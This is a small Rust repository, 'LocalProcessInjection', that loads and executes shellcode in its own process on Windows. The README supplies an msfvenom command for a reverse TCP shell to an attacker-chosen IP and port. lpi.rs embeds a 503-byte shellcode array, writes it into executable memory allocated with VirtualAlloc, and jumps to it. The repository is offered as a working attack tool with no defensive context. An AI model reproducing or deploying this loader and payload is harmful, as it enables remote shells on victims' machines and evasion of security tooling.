├── Cargo.toml ├── README.md └── lpi.rs /Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "lpi" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [target.'cfg(windows)'.dependencies] 9 | winapi = { version = "0.3.9", features = ["minwindef", "winnt", "memoryapi"] } 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LocalProcessInjection 2 | Executing Shellcode in Local Process 3 | 4 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=Your_IP LPORT=9443 -f c -b \x00\x0a\x0d 5 | 6 | 7 | cargo build --release 8 | 9 | 10 | -------------------------------------------------------------------------------- /lpi.rs: -------------------------------------------------------------------------------- 1 | use std::{mem, ptr}; 2 | use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect}; 3 | use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE}; 4 | 5 | fn main() { 6 | let a: [u8; 503] = [ 7 | 0x87, 0x8f, 0xdd, 0xaf, 0x63, 0x36, 0x71, 0x5c, 0x4f, 0xdb, 0x95, 0x7e, 0xf2, 0x2f, 0xbb, 8 | 0x00, 0x99, 0xca, 0xce, 0xef, 0xeb, 0x36, 0xa3, 0x19, 0x9d, 0xdb, 0x17, 0x42, 0x93, 0x36, 9 | 0xa8, 0xa7, 0x27, 0xcb, 0xd5, 0xf7, 0xe9, 0x3f, 0x71, 0x4a, 0x2e, 0xc4, 0x6b, 0x51, 0x4c, 10 | 0x2a, 0xb3, 0xe6, 0xb0, 0xe0, 0xa6, 0xf1, 0x80, 0x45, 0xfa, 0x58, 0x86, 0xc5, 0xdd, 0x27, 11 | 0x55, 0x3f, 0x7b, 0xb4, 0x67, 0x92, 0x94, 0xae, 0xfa, 0xfe, 0x1f, 0x11, 0x7b, 0x91, 0x94, 12 | 0x8a, 0x50, 0xb7, 0x52, 0x5a, 0xcd, 0xd2, 0xc0, 0xe7, 0x3a, 0x93, 0xb6, 0xd1, 0x36, 0xd2, 13 | 0x2e, 0xe2, 0xc4, 0x51, 0xfd, 0xa7, 0x12, 0xdf, 0x1d, 0x44, 0xdb, 0x76, 0xfb, 0x58, 0xc7, 14 | 0xca, 0xd5, 0x14, 0x9a, 0xf7, 0x91, 0x58, 0x38, 0x46, 0xc4, 0xfe, 0xfe, 0x46, 0x33, 0x15, 15 | 0xf6, 0x53, 0xdc, 0x51, 0x73, 0x3f, 0x73, 0x9a, 0x8f, 0x6c, 0x54, 0xe6, 0x3a, 0xb6, 0xbb, 16 | 0xe2, 0x2d, 0x9c, 0x4b, 0x4e, 0x4c, 0xa2, 0xb2, 0xd1, 0x00, 0xf9, 0x84, 0xef, 0xeb, 0x3b, 17 | 0x73, 0xba, 0x8f, 0x1a, 0x6d, 0xef, 0x09, 0xee, 0x5f, 0x2c, 0xa6, 0x6c, 0x41, 0xe6, 0x32, 18 | 0xb3, 0xba, 0x5a, 0xc7, 0x93, 0xdd, 0x16, 0xd0, 0x1a, 0x9e, 0x58, 0xc7, 0x93, 0x94, 0xae, 19 | 0xf2, 0x27, 0xbb, 0x08, 0x8f, 0x1a, 0x76, 0xf9, 0xe4, 0x20, 0xb7, 0x69, 0x07, 0xf9, 0x99, 20 | 0xf7, 0xf2, 0x27, 0x18, 0xa4, 0xa1, 0x54, 0xd0, 0x8a, 0xe7, 0x76, 0xfb, 0x10, 0x4a, 0xd7, 21 | 0xb0, 0xb6, 0x75, 0x77, 0x92, 0x10, 0x4e, 0x75, 0xc2, 0xfe, 0xf2, 0x27, 0xbb, 0x08, 0x86, 22 | 0xc3, 0xdd, 0x51, 0x73, 0x36, 0xaa, 0x11, 0x38, 0x5b, 0xd9, 0x27, 0x72, 0x3b, 0x73, 0x99, 23 | 0x86, 0x29, 0xed, 0x62, 0x8c, 0xf1, 0x05, 0x8d, 0x8f, 0xa2, 0x46, 0xe6, 0x4c, 0xbd, 0x71, 24 | 0x56, 0x86, 0x29, 0x9c, 0x29, 0xae, 0x17, 0x05, 0x8d, 0x7c, 0x63, 0x21, 0x0c, 0xe5, 0x36, 25 | 0x40, 0xfe, 0x52, 0x2e, 0x09, 0x51, 0x66, 0x3f, 0x79, 0x9c, 0xef, 0xaf, 0x92, 0xd2, 0xb9, 26 | 0xf7, 0x01, 0xb8, 0xb2, 0x96, 0x2f, 0xe9, 0xa0, 0x05, 0x95, 0x32, 0xc7, 0xca, 0xd5, 0x27, 27 | 0x69, 0x88, 0x2f, 0x58, 0xc7, 0x93, 0x94, 28 | ]; 29 | 30 | let b = unsafe { 31 | VirtualAlloc( 32 | ptr::null_mut(), 33 | a.len(), 34 | MEM_COMMIT | MEM_RESERVE, 35 | PAGE_EXECUTE_READWRITE, 36 | ) 37 | }; 38 | 39 | if !b.is_null() { 40 | unsafe { 41 | ptr::copy_nonoverlapping(a.as_ptr(), b as *mut u8, a.len()); 42 | let mut c = 0; 43 | VirtualProtect(b, a.len(), PAGE_EXECUTE_READWRITE, &mut c); 44 | let d: fn() = mem::transmute(b); 45 | d(); 46 | } 47 | } 48 | } 49 | --------------------------------------------------------------------------------